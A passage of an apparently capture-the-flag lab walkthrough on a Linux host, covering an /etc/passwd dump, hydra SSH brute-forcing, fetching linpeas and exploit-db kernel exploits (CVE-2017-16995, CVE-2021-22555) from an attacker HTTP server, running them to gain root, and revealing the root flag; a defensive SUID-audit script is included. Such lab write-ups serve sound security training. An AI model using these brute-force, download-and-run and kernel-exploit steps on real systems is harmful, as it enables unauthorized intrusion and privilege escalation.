daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
lxd:x:107:65534::/var/lib/lxd/:/bin/false
uuidd:x:108:113::/run/uuidd:/bin/false
postgres:x:109:115:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
bind:x:111:117::/var/cache/bind:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:113:1::/var/cache/pollinate:/bin/false
exploiter:x:1000:1000:exploiter,,,:/home/exploiter:/bin/bash
apache2:x:1001:1001:,,,:/var/www:/bin/bash
```

Username found: `exploiter`

### SSH Bruteforce

Since we found a user named `exploiter`, let's try to brute-force SSH.

```
hydra -t 64 -l exploiter -P /usr/share/wordlists/rockyou.txt ssh://192.168.229.158
```

Result:

```
Hydra v9.6dev (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-03 00:49:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.229.158:22/
[STATUS] 619.00 tries/min, 619 tries in 00:01h, 14343832 to do in 386:13h, 12 active
[STATUS] 396.33 tries/min, 1189 tries in 00:03h, 14343263 to do in 603:10h, 11 active
[STATUS] 326.57 tries/min, 2286 tries in 00:07h, 14342166 to do in 731:58h, 11 active

```

Nothing found in the first 2286 tries...

### Linpeas

Now, I will transfer linpeas from my attacker machine to the target machine.

On my attacker machine (in the directory that contains linpeas.sh):

```
python3 -m http.server 8080
```

On the target machine, let's go to the /tmp directory and download linpeas.sh:

```
cd /tmp
www-data@gamma:/tmp$ ls
ls
www-data@gamma:/tmp$ ls -la
ls -la
total 8
drwxrwxrwt  2 root root 4096 Dec  2 20:21 .
drwxr-xr-x 23 root root 4096 Nov 25 23:03 ..
www-data@gamma:/tmp$ wget http://192.168.229.150:8080/linpeas.sh
wget http://192.168.229.150:8080/linpeas.sh
--2024-12-02 20:24:21--  http://192.168.229.150:8080/linpeas.sh
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 823059 (804K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 803.77K  --.-KB/s    in 0.006s  

2024-12-02 20:24:21 (135 MB/s) - 'linpeas.sh' saved [823059/823059]

www-data@gamma:/tmp$ ls
ls
linpeas.sh
```

Making the script executable:

```
chmod +x linpeas.sh
```

Running linpeas:

```
./linpeas.sh
```

<figure><img src="/files/n7wew40mqfNrY67JlWIW" alt=""><figcaption></figcaption></figure>

Important things found by linpeas.sh:

* The `sudo` version (`1.8.19p1`) on the system may be vulnerable to the "Baron Samedit" exploit.
* CVE-2021-4034 ("PwnKit"): a known privilege escalation vulnerability in `pkexec` (part of Polkit). The system appears vulnerable to it.
* The `/usr/share/openssh/sshd_config` file is world-readable.
* The `/tmp` folder is writable, and LinPEAS has identified writable files owned by `www-data` and others in `/tmp` and `/var/tmp`.
* Several cron jobs are running, and `/etc/cron.daily`, `/etc/cron.weekly`, and similar directories are populated.
* Several SUID binaries (`/usr/bin/pkexec`, `/usr/lib/snapd/snap-confine`) are present.
* A `.bash_history` file is available for the `apache2` user.

### Exploit db

Three exploits found for our Ubuntu version:

<figure><img src="/files/7deZkAgZpG9iklpcj0Oj" alt=""><figcaption></figcaption></figure>

### Manual Privilege Escalation

#### SUID

```
find / -type f -perm -04000 -ls 2>/dev/null
```

Result:

```
www-data@gamma:/$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
   149353     40 -rwsr-xr-x   1 root     root        38984 Mar  7  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   402109     76 -rwsr-xr-x   1 root     root        76168 Apr  6  2017 /usr/lib/snapd/snap-confine
   149529     16 -rwsr-xr-x   1 root     root        14328 Oct 21  2016 /usr/lib/policykit-1/polkit-agent-helper-1
   148761    432 -rwsr-xr-x   1 root     root       440728 Mar 30  2017 /usr/lib/openssh/ssh-keysign
   131590     44 -rwsr-xr--   1 root     messagebus    42992 Oct 11  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   131600     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   131393     56 -rwsr-xr-x   1 root     root          54256 Sep 20  2016 /usr/bin/passwd
   148991     52 -rwsr-sr-x   1 daemon   daemon        51464 Dec 22  2016 /usr/bin/at
   149475     36 -rwsr-xr-x   1 root     root          32944 Sep 20  2016 /usr/bin/newgidmap
   131382     40 -rwsr-xr-x   1 root     root          39904 Sep 20  2016 /usr/bin/newgrp
   149476     36 -rwsr-xr-x   1 root     root          32944 Sep 20  2016 /usr/bin/newuidmap
   149526     24 -rwsr-xr-x   1 root     root          22520 Oct 21  2016 /usr/bin/pkexec
   131479    140 -rwsr-xr-x   1 root     root         140944 Jan 13  2017 /usr/bin/sudo
   131228     72 -rwsr-xr-x   1 root     root          71824 Sep 20  2016 /usr/bin/chfn
   131300     76 -rwsr-xr-x   1 root     root          75304 Sep 20  2016 /usr/bin/gpasswd
   131230     40 -rwsr-xr-x   1 root     root          40432 Sep 20  2016 /usr/bin/chsh
   148699     20 -rwsr-xr-x   1 root     root          18448 Mar  9  2017 /usr/bin/traceroute6.iputils
   532095      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/..a
   526038      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/a
   528794      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/.a
   262218     64 -rwsr-xr-x   1 root     root          64424 Mar  9  2017 /bin/ping
   278115     32 -rwsr-xr-x   1 root     root          30800 Aug 11  2016 /bin/fusermount
   262255     32 -rwsr-xr-x   1 root     root          30792 Nov 16  2016 /bin/umount
   277305    144 -rwsr-xr-x   1 root     root         146128 Feb  1  2017 /bin/ntfs-3g
   262205     40 -rwsr-xr-x   1 root     root          38984 Nov 16  2016 /bin/mount
   262236     40 -rwsr-xr-x   1 root     root          40128 Sep 20  2016 /bin/su
```

I searched for each one on GTFOBins, but nothing useful was found.
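Going through a listing like this by hand is error-prone; a reviewer wants the odd entries surfaced automatically. The script below is an added example (not part of the original write-up): it parses `find -ls` style lines, such as the ones above, and flags setuid files that live outside the standard binary directories, are not owned by root, have hidden names, or are both setuid and setgid. `TRUSTED_DIRS` is an assumption for this example, and the embedded listing is a constructed subset of the lines shown above.

```python
"""Audit a `find / -perm -4000 -ls` listing for setuid files that deserve
a closer look.  Added example, not part of the original write-up; the
sample listing below is a constructed subset of the lines shown above."""
import re
from dataclasses import dataclass, field

# Column layout of `find -ls`: inode, blocks, perms, links, owner, group,
# size, month, day, year-or-time, path.
LS_LINE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<perms>\S{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)\s*$"
)

# Where a distribution-supplied setuid binary is expected to live (an
# assumption for this example; tune it to the baseline of the host reviewed).
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


@dataclass
class Finding:
    path: str
    owner: str
    reasons: list = field(default_factory=list)


def audit_suid_listing(listing: str) -> list:
    """Return one Finding per setuid entry that trips at least one check."""
    findings = []
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue  # not a `find -ls` line
        path, owner, perms = m["path"], m["owner"], m["perms"].lower()
        reasons = []
        if not path.startswith(TRUSTED_DIRS):
            reasons.append("outside trusted directories")
        if owner != "root":
            reasons.append(f"owned by {owner}, not root")
        if path.rsplit("/", 1)[-1].startswith("."):
            reasons.append("hidden filename")
        # perms[3] is the owner execute slot ('s' = setuid), perms[6] the
        # group execute slot ('s' = setgid)
        if perms[3] == "s" and perms[6] == "s":
            reasons.append("setuid and setgid")
        if reasons:
            findings.append(Finding(path, owner, reasons))
    return findings


# Constructed subset of the write-up's listing.
SAMPLE_LISTING = """\
   131479    140 -rwsr-xr-x   1 root     root         140944 Jan 13  2017 /usr/bin/sudo
   148991     52 -rwsr-sr-x   1 daemon   daemon        51464 Dec 22  2016 /usr/bin/at
   532095      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/..a
   526038      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/a
   262236     40 -rwsr-xr-x   1 root     root          40128 Sep 20  2016 /bin/su
"""

if __name__ == "__main__":
    for f in audit_suid_listing(SAMPLE_LISTING):
        print(f"{f.path} ({f.owner}): {', '.join(f.reasons)}")
```

On the listing above the three `/tmp` entries are exactly what this surfaces: setuid files in a world-writable directory, owned by `www-data`, two of them with hidden names. Whether or not they lead anywhere, they are the first things a reviewer of this host should ask about.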

#### Sudo

Let's check which commands can be run with sudo without a password:

```
www-data@gamma:/$ sudo -l
[sudo] password for www-data:
```

We don't have the password of www-data, so this doesn't work.

#### Capabilities

```
www-data@gamma:/$ getcap -r / 2>/dev/null
/usr/bin/mtr = cap_net_raw+ep
www-data@gamma:/$
```

Let's go to GTFOBins and check whether `mtr` is listed.

<figure><img src="/files/QcqjVtszEp7UbpgC0wxq" alt=""><figcaption></figcaption></figure>

Only "File read" and "Sudo" are listed, so this doesn't work either.

#### Cronjobs

```
cat /etc/crontab
```

Results:

```
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

```

Let's check `cron.daily`:

```
www-data@gamma:/etc/cron.daily$ ls -la
total 64
drwxr-xr-x   2 root root 4096 Sep 16  2020 .
drwxr-xr-x 100 root root 4096 Nov 25 21:18 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root  539 Jul 16  2019 apache2
-rwxr-xr-x   1 root root  376 Dec 14  2016 apport
-rwxr-xr-x   1 root root 1474 Apr  1  2017 apt-compat
-rwxr-xr-x   1 root root  355 Oct 25  2016 bsdmainutils
-rwxr-xr-x   1 root root 1597 Apr 25  2016 dpkg
-rwxr-xr-x   1 root root  372 Mar 22  2017 logrotate
-rwxr-xr-x   1 root root 1065 Dec 13  2016 man-db
-rwxr-xr-x   1 root root  539 Jul 26  2016 mdadm
-rwxr-xr-x   1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x   1 root root  249 Nov 19  2014 passwd
-rwxr-xr-x   1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x   1 root root  441 Jan 28  2017 sysstat
-rwxr-xr-x   1 root root  214 Jul 12  2013 update-notifier-common
```

All of those scripts are root-owned and not writable by anyone else, so we can't edit any of them.

Let's move to another method.

#### Kernel

We found previously, with `uname -r`, that the kernel version is `4.10.0-19-generic`.

Let's search searchsploit for vulnerabilities associated with this version.

```
searchsploit Linux Kernel 4.10
```

Results:

```
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                                             | solaris/local/15962.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                                     | linux/local/50135.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                  | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)             | linux/local/37293.txt
Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation                                                       | linux/local/47163.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                  | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                            | linux/local/41886.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service                                                          | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                                                                          | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                                                     | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                                                                               | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                         | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                                                                     | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                                                                              | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                                                                  | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                                                                        | linux/dos/44579.c
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

```

Let's try this one:

```
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                         | linux/local/45010.c
```

Let's first copy it to our current directory:

```
┌──(kali㉿kali)-[~/tryhackme]
└─$ searchsploit -m 45010.c
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/tryhackme/45010.c

```

Now, let's move the exploit to the target machine.

On our attacker machine, let's start an HTTP server:

```
python3 -m http.server 8080
```

On the netcat session:

```
www-data@gamma:/tmp$ wget http://192.168.229.150:8080/45010.c
--2024-12-06 00:56:01--  http://192.168.229.150:8080/45010.c
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: '45010.c'

45010.c                                   100%[=====================================================================================>]  12.87K  --.-KB/s    in 0s      

2024-12-06 00:56:01 (618 MB/s) - '45010.c' saved [13176/13176]

www-data@gamma:/tmp$
```

Let's now compile the exploit:

```
gcc -o exploit 45010.c
```

Making it executable:

```
www-data@gamma:/tmp$ chmod +x exploit
```

Running it:

```
./exploit
```

Result:

```
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8d47f7b49b00
[*] Leaking sock struct from ffff8d47fc26c800
[*] Sock->sk_rcvtimeo at offset 592
[*] Cred structure at ffff8d47fc27c540
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff8d47fc27c540
[*] credentials patched, launching shell...
# whoami
root
#
```

And we are root!

Let's now upgrade the shell:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Let's now search for the flag:

```
find / -name "flag" 2>/dev/null
```

Result:

```
/var/www/html/images/flag.txt
/root/flag.txt
root@gamma:/#
```

```
cat /root/flag.txt
```

Result:

```
                          _____                          
                   _.+sd$$$$$$$$$bs+._                   
               .+d$$$$$$$$$$$$$$$$$$$$$b+.               
            .sd$$$$$$$P^*^T$$$P^*"*^T$$$$$bs.            
          .s$$$$$$$$P*     `*' _._  `T$$$$$$$s.          
        .s$$$$$$$$$P          ` :$;   T$$$$$$$$s.        
       s$$$$$$$$$$;  db..+s.   `**'    T$$$$$$$$$s       
     .$$$$$$$$$$$$'  `T$P*'             T$$$$$$$$$$.     
    .$$$$$$$$$$$$P                       T$$$$$$$$$$.    
   .$$$$$$$$$$$$$b                       `$$$$$$$$$$$.   
  :$$$$$$$$$$$$$$$.                       T$$$$$$$$$$$;  
  $$$$$$$$$P^*' :$$b.                     d$$$$$$$$$$$$  
 :$$$$$$$P'      T$$$$bs._               :P'`*^T$$$$$$$; 
 $$$$$$$P         `*T$$$$$b              '      `T$$$$$$ 
:$$$$$$$b            `*T$$$s                      :$$$$$;
:$$$$$$$$b.                                        $$$$$;
$$$$$$$$$$$b.                                     :$$$$$$
$$$$$$$$$$$$$bs.                                 .$$$$$$$
$$$$$$$$$$$$$$$$$bs.                           .d$$$$$$$$
:$$$$$$$$$$$$$P*"*T$$bs,._                  .sd$$$$$$$$$;
:$$$$$$$$$$$$P     TP^**T$bss++.._____..++sd$$$$$$$$$$$$;
 $$$$$$$$$$$$b           `T$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
 :$$$$$$$$$$$$b.           `*T$$P^*"*"*^^*T$$$$$$$$$$$$; 
  $$$b       `T$b+                        :$$$$$$$BUG$$  
  :$P'         `"'               ,._.     ;$$$$$$$$$$$;  
   \                            `*TP*     d$$P*******$   
    \                                    :$$P'      /    
     \                                  :dP'       /     
      `.                               d$P       .'      
BAKRI   `.                             `'      .'        
          `-.                               .-'          
             `-.                         .-'             
                `*+-._             _.-+*'                
                      `"*-------*"'
Congradulations on obtaining the allmighty root user flag. Great work! Do not forget that you have goal 2 in the CTF requirements
The flag of root:
flag{2893d890e8847d5575ac33229a037ca4}
root@gamma:/#
```

So the root flag is: `flag{2893d890e8847d5575ac33229a037ca4}`.

## 4- Extra Attack Vectors

### Privilege escalation

#### First one

Let's re-check the kernel version:

```
www-data@gamma:/tmp$ uname -r
4.10.0-19-generic
```

Now, let's search searchsploit for any other exploits:

```
searchsploit linux 4.10
```

Results:

```
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation                                                               | linux/local/37088.c
CyberArk < 10 - Memory Disclosure                                                                                                     | linux/remote/44829.py
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure                                                                              | linux/dos/44428.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution                                                                          | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution                                                                          | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution                                                                         | linux/remote/44921.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution                                                                         | linux/remote/44921.txt
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read                                                                       | linux/local/44688.txt
DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)                                                                              | linux/webapps/42769.rb
Exim < 4.86.2 - Local Privilege Escalation                                                                                            | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution                                                                                       | linux/remote/44571.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String                                                                                   | linux/local/22066.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)                                                               | linux/remote/16925.rb
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access                                                                                  | linux/remote/43386.py
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution                                                           | linux/webapps/44543.txt
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure                                                                  | linux/remote/44022.md
LinkLogger 2.4.10.15 - 'syslog' Denial of Service                                                                                     | linux/dos/8955.pl
Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module                                                        | linux/dos/46477.txt
Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall                                | linux/dos/44641.c
Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem                                                 | linux/dos/46502.txt
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                                             | solaris/local/15962.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                                     | linux/local/50135.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                  | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)             | linux/local/37293.txt
Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation                                                       | linux/local/47163.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                  | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                            | linux/local/41886.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service                                                          | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                                                                          | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                                                     | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                                                                               | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                         | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                                                                     | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                                                                              | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                                                                  | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                                                                        | linux/dos/44579.c
Logpoint < 5.6.4 - Root Remote Code Execution                                                                                         | linux/remote/42158.py
MiniDVBLinux <=5.4  - Config Download Exploit                                                                                         | hardware/remote/51091.txt
NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation                                                                 | linux/local/42305.txt
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                              | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                                        | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                                          | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                                                | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                                  | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                              | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                                  | linux/remote/45939.py
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service                                                                            | linux/dos/34522.txt
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service                                                                | linux/dos/34521.txt
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation                                                                 | linux/local/41196.txt
Oracle WebCenter FatWire Content Server < 7 - Improper Access Control                                                                 | linux/webapps/44757.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)                                                                                               | linux/local/44904.py
RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution                                                                     | linux/webapps/45361.py
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)                                                                            | linux/local/46359.md
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)                                                                            | linux/local/46369.md
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)                                                                           | linux/local/47009.c
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)                                                             | linux/webapps/41697.rb
Splunk < 7.0.1 - Information Disclosure                                                                                               | linux/webapps/44865.txt
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation                                              | linux/local/43935.txt
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                                                | linux/local/41760.txt
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution                                                         | linux/remote/42949.txt
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation                                                                        | linux/local/42936.md
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape                                                                           | linux/local/42937.md
UoW Pine 4.0.4/4.10/4.21 - 'From:' Remote Buffer Overflow                                                                             | linux/remote/20237.c
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation                                                             | linux/local/36820.txt
VFU 4.10-1.1 - Local Buffer Overflow                                                                                                  | linux/local/35450.txt
VFU 4.10-1.1 - Move Entry Buffer Overflow                                                                                             | linux/local/36229.py
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution                                                                            | linux/local/46973.md
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

There is one that caught my attention:

```
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                                     | linux/local/50135.c
```

Our kernel version is in this range. Let's try it out.

```
┌──(kali㉿kali)-[~/tryhackme]
└─$ searchsploit -m 50135  
  Exploit: Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/50135
     Path: /usr/share/exploitdb/exploits/linux/local/50135.c
    Codes: CVE-2021-22555
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/tryhackme/50135.c
```

First, let's read the exploit source to see whether any modifications are needed before running it on the vulnerable machine.

```
nano 50135.c
```

There is this line in the source: `gcc -m32 -static -o exploit exploit.c`

So, we need a toolchain that can build a 32-bit static binary. I asked ChatGPT for the compiler:

ChatGPT output:

```
sudo apt install gcc-multilib libc6-dev-i386 -y
```

So, I ran this command and compiled the exploit:

```
gcc -m32 -static -o exploit 50135.c
```

Now, let's move this exploit to the vulnerable machine.

On our attacker machine, let's start an HTTP server on port 8080:

```
python3 -m http.server 8080
```

On the nc session, let's run:

```
wget 192.168.229.150:8080/exploit
```

Result:

```
--2024-12-06 00:10:54--  http://192.168.229.150:8080/exploit
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 777336 (759K) [application/octet-stream]
Saving to: 'exploit'

exploit                                   100%[=====================================================================================>] 759.12K  --.-KB/s    in 0.005s  

2024-12-06 00:10:54 (163 MB/s) - 'exploit' saved [777336/777336]
```

```
chmod +x exploit
```

```
www-data@gamma:/tmp$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[-] Error could not corrupt any primary message.
www-data@gamma:/tmp$ uname -r
4.10.0-19-generic
```

It didn't work.
